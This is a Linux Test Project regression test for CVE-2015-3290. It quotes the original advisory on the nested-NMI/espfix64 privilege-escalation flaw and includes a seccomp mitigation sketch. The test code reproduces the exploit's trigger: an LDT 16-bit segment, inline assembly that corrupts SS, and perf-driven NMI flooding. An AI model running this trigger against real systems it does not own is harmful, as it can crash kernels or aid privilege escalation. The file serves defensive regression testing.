// SPDX-License-Identifier: GPL-2.0-or-later
/*
 * Copyright (c) 2017 Pavel Boldin <pboldin@cloudlinux.com>
 */

/*

NOTE: rather than checking for full nested NMI exploitation we simply check
that the NMI stack state can be corrupted with this code.

http://www.openwall.com/lists/oss-security/2015/08/04/8

> +++++ CVE-2015-3290 +++++
>
> High impact NMI bug on x86_64 systems 3.13 and newer, embargoed.  Also fixed
> by:
>
> https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c255d1395c2ba570e0a
>
> The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290.
>
> You can mitigate CVE-2015-3290 by blocking modify_ldt or
> perf_event_open using seccomp.  A fully-functional, portable, reliable
> exploit is privately available and will be published in a week or two.
> *Patch your systems*

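As a rough sketch of the seccomp mitigation mentioned above (not part of
the advisory, and not used by this test), a filter that denies modify_ldt
and perf_event_open might look like the following; a check of the arch
field is omitted for brevity:

    #include <errno.h>
    #include <stddef.h>
    #include <sys/prctl.h>
    #include <sys/syscall.h>
    #include <linux/filter.h>
    #include <linux/seccomp.h>

    static void deny_ldt_and_perf(void)
    {
            struct sock_filter filter[] = {
                    // Load the syscall number.
                    BPF_STMT(BPF_LD | BPF_W | BPF_ABS,
                             offsetof(struct seccomp_data, nr)),
                    // Send the two syscalls to the EPERM return below.
                    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_modify_ldt, 2, 0),
                    BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_perf_event_open, 1, 0),
                    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
                    BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ERRNO | EPERM),
            };
            struct sock_fprog prog = {
                    .len = sizeof(filter) / sizeof(filter[0]),
                    .filter = filter,
            };

            // Needed so an unprivileged process may install the filter.
            prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);
            prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog);
    }
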
And here's a real advisory:

If an NMI returns via espfix64 and is interrupted during espfix64 setup
by another NMI, the return state is corrupt.  This is exploitable for
reliable privilege escalation on any Linux x86_64 system in which
untrusted code can arrange for espfix64 to be invoked and for NMIs to be
nested.

Glossing over a lot of details, the basic structure of Linux' nested NMI
handling is:

nmi_handler:
    if (in_nmi) {
	nmi_latched = true;
	return;
    }
    in_nmi = true;
    handle the nmi;
    atomically (this is magic):
	if (nmi_latched) {
	    nmi_latched = false;
	    start over;
	} else {
	    in_nmi = false;
	    return and unmask NMIs;
	}

Alas, on x86_64, there is no reasonable way to block NMIs to run the
atomic part of that pseudocode atomically.  Instead, the entire atomic
piece is implemented by the single instruction IRET.

But x86_64 is more broken than just that.  The IRET instruction does not
restore register state correctly [1] when returning to a 16-bit stack
segment.  x86_64 has a complicated workaround called espfix64.  If
espfix64 is invoked on return, a well-behaved IRET is emulated by a
complicated scheme that involves manually switching stacks.  During the
stack switch, there is a window of approximately 19 instructions between
the start of espfix64's access to the original stack and when espfix64
is done with the original stack.  If a nested NMI occurs during this
window, then the atomic part of the basic nested NMI algorithm is
observably non-atomic.

Depending on exactly where in this window the nested NMI hits, the
results vary.  Most nested NMIs will corrupt the return context and
crash the calling process.  Some are harmless except that the nested NMI
gets ignored.  There is a two-instruction window in which the return
context ends up with user-controlled RIP and CS set to __KERNEL_CS.

A careful exploit (attached) can recover from all the crashy failures
and can regenerate a valid *privileged* state if a nested NMI occurs
during the two-instruction window.  This exploit appears to work
reasonably quickly across a fairly wide range of Linux versions.

If you have SMEP, this exploit is likely to panic the system.  Writing
a usable exploit against a SMEP system would be considerably more
challenging, but it's surely possible.

Measures like UDEREF are unlikely to help, because this bug is outside
any region that can be protected using paging or segmentation tricks.
However, recent grsecurity kernels seem to forcibly disable espfix64, so
they're not vulnerable in the first place.

A couple of notes:

  - This exploit's payload just prints the text "CPL0".  The exploit
    will keep going after printing CPL0 so you can enjoy seeing the
    frequency with which it wins.  Interested parties could easily
    write different payloads.  I doubt that any existing exploit
    mitigation techniques would be useful against this type of
    attack.

  - If you are using a kernel older than v4.1, a 64-bit build of the
    exploit will trigger a signal handling bug and crash.  Defenders
    should not rejoice, because the exploit works fine when built
    as a 32-bit binary or (so I'm told) as an x32 binary.

  - This is the first exploit I've ever written that contains genuine
    hexadecimal code.  The more assembly-minded among you can have
    fun figuring out why :)

[1] By "correctly", I mean that the register state ends up different
from that which was saved in the stack frame, not that the
implementation doesn't match the spec in the microcode authors' minds.
The spec is simply broken (differently on AMD and Intel hardware,
perhaps unsurprisingly.)

--Andy
*/

#include "config.h"
#include "tst_test.h"
#include "tst_timer.h"

#if HAVE_PERF_EVENT_ATTR && (defined(__x86_64__) || defined(__i386__))

#include <stdlib.h>
#include <stdio.h>
#include <inttypes.h>
#include <asm/ldt.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <setjmp.h>
#include <signal.h>
#include <string.h>
#include <sys/wait.h>
#include <linux/perf_event.h>

#include "lapi/syscalls.h"
#include "tst_safe_pthread.h"

/* Abstractions for some 32-bit vs 64-bit differences. */
#ifdef __x86_64__
# define REG_IP REG_RIP
# define REG_SP REG_RSP
# define REG_AX REG_RAX

struct selectors {
	unsigned short cs, gs, fs, ss;
};

LTP_ATTRIBUTE_UNUSED
static unsigned short *ssptr(ucontext_t *ctx)
{
	struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
	return &sels->ss;
}

LTP_ATTRIBUTE_UNUSED
static unsigned short *csptr(ucontext_t *ctx)
{
	struct selectors *sels = (void *)&ctx->uc_mcontext.gregs[REG_CSGSFS];
	return &sels->cs;
}
#else
# define REG_IP  REG_EIP
# define REG_SP  REG_ESP
# define REG_AX  REG_EAX
# define REG_CR2 (REG_SS + 3)

LTP_ATTRIBUTE_UNUSED
static greg_t *ssptr(ucontext_t *ctx)
{
	return &ctx->uc_mcontext.gregs[REG_SS];
}

LTP_ATTRIBUTE_UNUSED
static greg_t *csptr(ucontext_t *ctx)
{
	return &ctx->uc_mcontext.gregs[REG_CS];
}
#endif

static volatile long expected_rsp;
static int running = 1;

static void set_ldt(void)
{
	/* Boring 16-bit data segment. */
	const struct user_desc data_desc = {
		.entry_number    = 0,
		.base_addr       = 0,
		.limit           = 0xfffff,
		.seg_32bit       = 0,
		.contents        = 0, /* Data, expand-up */
		.read_exec_only  = 0,
		.limit_in_pages  = 0,
		.seg_not_present = 0,
		.useable         = 0
	};

	TEST(tst_syscall(__NR_modify_ldt, 1, &data_desc, sizeof(data_desc)));
	if (TST_RET == -EINVAL) {
		tst_brk(TCONF | TRERRNO,
			"modify_ldt: 16-bit data segments are probably disabled");
	} else if (TST_RET != 0) {
		tst_brk(TBROK | TRERRNO, "modify_ldt");
	}
}

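/*
 * The selector 0x7 loaded into SS in try_corrupt_stack() below refers to
 * the LDT entry installed by set_ldt(): index 0, table indicator set (LDT)
 * and RPL 3, i.e. (0 << 3) | 4 | 3.
 */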
static void try_corrupt_stack(unsigned short orig_ss)
{
#ifdef __x86_64__
	asm volatile (
	      /* A small puzzle for the curious reader. */
	      "mov    $2048, %%rbp    \n\t"

	      /* Save rsp for diagnostics */
	      "mov    %%rsp, %[expected_rsp] \n\t"

	      /*
	       * Let 'er rip.
	       */
	      "mov    %[ss], %%ss \n\t"   /* begin corruption */
	      "movl   $1000, %%edx    \n\t"
	      "1:  decl   %%edx       \n\t"
	      "jnz    1b      \n\t"
	      "mov    %%ss, %%eax \n\t"   /* grab SS to display */

	      /* Did we enter CPL0? */
	      "mov    %%cs, %%dx  \n\t"
	      "testw  $3, %%dx    \n\t"
	      "jnz    2f      \n\t"
	      "leaq   3f(%%rip), %%rcx  \n\t"
	      "movl   $0x200, %%r11d  \n\t"
	      "sysretq	\n\t"
	      "2:	     \n\t"

	      /*
	       * Stop further corruption.  We need to check CPL
	       * first because we need RPL == CPL.
	       */
	      "mov    %[orig_ss], %%ss \n\t"  /* end corruption */

	      "subq   $128, %%rsp \n\t"
	      "pushfq	 \n\t"
	      "testl  $(1<<9),(%%rsp)   \n\t"
	      "addq   $136, %%rsp \n\t"
	      "jz 3f      \n\t"
	      "cmpl   %[ss], %%eax    \n\t"
	      "je 4f      \n\t"
	      "3:  int3	   \n\t"
	      "4:	     \n\t"
	      : [expected_rsp] "=m" (expected_rsp)
	      : [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
	      : "rax", "rcx", "rdx", "rbp", "r11", "flags"
	);
#else
	asm volatile (
	      /* A small puzzle for the curious reader. */
	      "mov    %%ebp, %%esi    \n\t"
	      "mov    $2048, %%ebp    \n\t"

	      /* Save rsp for diagnostics */
	      "mov    %%esp, %[expected_rsp] \n\t"

	      /*
	       * Let 'er rip.
	       */
	      "mov    %[ss], %%ss \n\t"   /* begin corruption */
	      "movl   $1000, %%edx    \n\t"
	      "1:  .byte 0xff, 0xca   \n\t"   /* decl %edx */
	      "jnz    1b      \n\t"
	      "mov    %%ss, %%eax \n\t"   /* grab SS to display */

	      /* Did we enter CPL0? */
	      "mov    %%cs, %%dx  \n\t"
	      "testw  $3, %%dx    \n\t"
	      "jnz    2f      \n\t"
	      ".code64	\n\t"
	      "leaq   3f(%%rip), %%rcx \n\t"
	      "movl   $0x200, %%r11d  \n\t"
	      "sysretl	\n\t"
	      ".code32	\n\t"
	      "2:	     \n\t"

	      /*
	       * Stop further corruption.  We need to check CPL
	       * first because we need RPL == CPL.
	       */
	      "mov    %[orig_ss], %%ss \n\t"  /* end corruption */

	      "pushf	  \n\t"
	      "testl  $(1<<9),(%%esp)   \n\t"
	      "addl   $4, %%esp   \n\t"
	      "jz 3f      \n\t"
	      "cmpl   %[ss], %%eax    \n\t"
	      "je 4f      \n\t"
	      "3:  int3	   \n\t"
	      "4:  mov %%esi, %%ebp   \n\t"
	      : [expected_rsp] "=m" (expected_rsp)
	      : [ss] "r" (0x7), [orig_ss] "m" (orig_ss)
	      : "eax", "ecx", "edx", "esi", "flags"
	);
#endif
}

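/*
 * glibc provides no wrapper for perf_event_open(), so invoke it via
 * tst_syscall().
 */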
static int perf_event_open(struct perf_event_attr *hw_event, pid_t pid,
			   int cpu, int group_fd, unsigned long flags)
{
	int ret;

	ret = tst_syscall(__NR_perf_event_open, hw_event, pid, cpu,
			  group_fd, flags);
	return ret;
}

static int event_mlock_kb;
static int max_sample_rate;

static void *child_thread(void *arg LTP_ATTRIBUTE_UNUSED)
{
	long niter = 0;
	unsigned short orig_ss;

	struct perf_event_attr pe = {
		.size = sizeof(struct perf_event_attr),
		.disabled = 0,
		.exclude_kernel = 0,
		.exclude_hv = 0,
		.freq = 1,
		.sample_type = PERF_SAMPLE_IP|PERF_SAMPLE_TID|
			PERF_SAMPLE_TIME|PERF_SAMPLE_CALLCHAIN|
			PERF_SAMPLE_ID|PERF_SAMPLE_PERIOD,
	};
	/* Workaround bug in GCC 4.4.7 (CentOS6) */
	pe.sample_freq = max_sample_rate / 5;

	struct {
		uint32_t type;
		uint64_t config;
		const char *name;
	} perf_events[] = {
		{
			.type = PERF_TYPE_HARDWARE,
			.config = PERF_COUNT_HW_INSTRUCTIONS,
			.name = "hw instructions",
		},
		{
			.type = PERF_TYPE_HARDWARE,
			.config = PERF_COUNT_HW_CACHE_REFERENCES,
			.name = "hw cache references",
		},
	};

	void *perf_mmaps[ARRAY_SIZE(perf_events)];
	unsigned int i;

	for (i = 0; i < ARRAY_SIZE(perf_events); i++) {
		int fd;

		pe.type = perf_events[i].type;
		pe.config = perf_events[i].config;

		fd = perf_event_open(&pe, 0, -1, -1, 0);
		if (fd == -1) {
			if (errno == EINVAL || errno == ENOENT ||
			    errno == EBUSY)
				tst_brk(TCONF | TERRNO,
					"no hardware counters");
			else
				tst_brk(TBROK | TERRNO, "perf_event_open");
			/* tst_brk exits */
		}

		perf_mmaps[i] = SAFE_MMAP(NULL, event_mlock_kb * 1024,
					  PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
		SAFE_CLOSE(fd);
	}

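	/* Remember the original SS so try_corrupt_stack() can restore it. */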
	asm volatile ("mov %%ss, %0" : "=rm" (orig_ss));

	for (niter = 0; running && niter < 1000*1000*1000L; niter++) {

		try_corrupt_stack(orig_ss);

		/*
		 * If we ended up with IF == 0, there's no easy way to fix
		 * it.  Instead, make frequent syscalls to avoid hanging
		 * the system.
		 */
		syscall(0x3fffffff);
	}

	for (i = 0; i < ARRAY_SIZE(perf_events); i++)
		if (perf_mmaps[i] != MAP_FAILED)
			SAFE_MUNMAP(perf_mmaps[i], event_mlock_kb * 1024);

	return (void *)niter;
}

#define TIMEOUT		(180)
#define TIME_TO_GIVEUP	(TIMEOUT - 5)
#define TIMER_TYPE	CLOCK_MONOTONIC

static void do_child(void)
{
	int i, ncpus;
	pthread_t *threads;
	long iter, total_iter = 0;

	tst_res(TINFO, "attempting to corrupt nested NMI stack state");

	set_ldt();

	ncpus = tst_ncpus();
	threads = SAFE_MALLOC(sizeof(*threads) * ncpus);

	for (i = 0; i < ncpus; i++)
		SAFE_PTHREAD_CREATE(&threads[i], NULL, child_thread, NULL);

	sleep(TIME_TO_GIVEUP);
	running = 0;

	for (i = 0; i < ncpus; i++) {
		SAFE_PTHREAD_JOIN(threads[i], (void **)&iter);
		total_iter += iter;
	}
	free(threads);

	tst_res(TPASS, "can't corrupt nested NMI state after %ld iterations",
		total_iter);
}

static void setup(void)
{
	/*
	 * According to perf_event_open's manpage, the official way of
	 * knowing if perf_event_open() support is enabled is checking for
	 * the existence of the file /proc/sys/kernel/perf_event_paranoid.
	 */
	if (access("/proc/sys/kernel/perf_event_paranoid", F_OK) == -1)
		tst_brk(TCONF, "Kernel doesn't have perf_event support");

	SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_mlock_kb",
			"%d", &event_mlock_kb);
	SAFE_FILE_SCANF("/proc/sys/kernel/perf_event_max_sample_rate",
			"%d", &max_sample_rate);
}

static void run(void)
{
	pid_t pid;
	int status;

	pid = SAFE_FORK();
	if (pid == 0) {
		do_child();
		return;
	}

	SAFE_WAITPID(pid, &status, 0);
	if (WIFSIGNALED(status) && WTERMSIG(status) == SIGSEGV)
		tst_res(TFAIL, "corrupted NMI stack");
	else if (WIFEXITED(status) && WEXITSTATUS(status) != 0)
		tst_res(WEXITSTATUS(status), "Propagate child status");
}

static struct tst_test test = {
	.forks_child = 1,
	.needs_root = 1,
	.needs_checkpoints = 1,
	.setup = setup,
	.timeout = TIMEOUT,
	.test_all = run,
	.tags = (const struct tst_tag[]) {
		{"linux-git", "9b6e6a8334d5"},
		{"CVE", "2015-3290"},
		{}
	}
};

#else /* HAVE_PERF_EVENT_ATTR && (defined(__x86_64__) || defined(__i386__)) */

TST_TEST_TCONF("no perf_event_attr or not (i386 or x86_64)");

#endif